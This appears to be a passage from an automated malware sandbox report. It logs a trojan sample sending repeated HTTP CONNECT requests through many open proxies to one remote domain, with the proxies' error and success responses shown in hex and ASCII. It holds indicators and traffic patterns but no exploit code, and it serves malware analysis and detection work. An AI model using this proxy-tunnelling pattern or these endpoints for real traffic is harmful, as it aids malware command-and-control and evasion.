                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 37 20 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 34 30 37 20 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 68 32 3e 3c 68 33 3e 41 63 63 65 73 73 20 74 6f 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 64 69 73 61 6c 6c 6f 77 65 64 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 6f 72 20 79 6f 75 20 6e 65 65 64 20 76 61 6c 69 64 20 75 73 65 72 6e 61 6d 65 2f 70 61 73 73 77 6f 72 64 20 74 6f 20 75 73 65 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>407 Proxy Authentication Required</title></head><body><h2>407 Proxy Authentication Required</h2><h3>Access to requested resource disallowed by administrator or you need valid username/password to use this resource</h3></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                878192.168.2.85280558.234.116.19781975828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.177966118 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                879192.168.2.851934117.160.250.138805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.209690094 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.819545031 CET303INHTTP/1.1 400 Bad Request
                                                                                Server: openresty
                                                                                Date: Fri, 23 Feb 2024 13:28:29 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 154
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                880192.168.2.852828176.120.32.13556785828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.224112034 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                881192.168.2.852846192.210.228.28156735828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.224112034 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                882192.168.2.85237227.65.30.3710805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.247977018 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                883192.168.2.852810103.118.46.17480805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.248289108 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                884192.168.2.852857162.159.241.5805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.248562098 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.336957932 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:28 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                885192.168.2.852822125.228.143.20741455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.252931118 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                886192.168.2.852868104.20.179.187805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.253505945 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.341243029 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:28 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                887192.168.2.852872185.238.228.67805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.268366098 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.356158972 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:28 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                888192.168.2.852884203.22.223.12805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.275666952 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.363503933 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:28 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                889192.168.2.852886104.19.171.188805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.276196957 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.363219023 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:28 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                890192.168.2.852860159.203.61.16931285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.276452065 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.397183895 CET28INHTTP/1.1 400 Bad Request


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                891192.168.2.852820103.23.100.141455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.303683043 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                892192.168.2.852809115.144.163.192271815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.320461988 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.194920063 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.491913080 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.992084026 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:44.080619097 CET39INHTTP/1.0 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                893192.168.2.852837185.101.16.52805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.348890066 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                894192.168.2.851596113.160.182.236191325828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.353466034 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.382457972 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.382838011 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.382864952 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:52.382801056 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                895192.168.2.852851146.59.2.185805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.362921953 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                896192.168.2.852373103.148.51.1980805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.378716946 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                897192.168.2.85289351.81.186.179514055828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.396126986 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.882477045 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.382989883 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.382627010 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.382652044 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.382730007 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.382644892 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.382746935 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:48.382416010 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                898192.168.2.851581103.164.13.14880805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.402302027 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.812165976 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                899192.168.2.851647141.94.174.6264225828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.412787914 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.882527113 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.382633924 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.195014954 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.492002964 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                900192.168.2.852832102.132.57.9080805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.444677114 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                901192.168.2.85285065.20.216.24980805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.449692011 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                902192.168.2.852385195.177.217.131161505828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.456459999 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.491816044 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.492046118 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.492001057 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:52.491738081 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:04.491595030 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:16.585755110 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                903192.168.2.85283443.133.80.236156735828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.484673977 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                904192.168.2.852892154.92.116.7763895828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.484777927 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.796710968 CET459INHTTP/1.1 407 Proxy Authentication Required
                                                                                Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization."
                                                                                Proxy-Connection: close
                                                                                X-Webshare-Error: 407
                                                                                X-Webshare-Reason: invalidpassword
                                                                                Date: Fri, 23 Feb 2024 13:28:28 GMT
                                                                                Content-Length: 121
                                                                                Content-Type: text/plain; charset=utf-8
                                                                                Connection: close
                                                                                Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e
                                                                                Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                905192.168.2.852452107.180.88.41172765828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.488533020 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.491789103 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.492042065 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
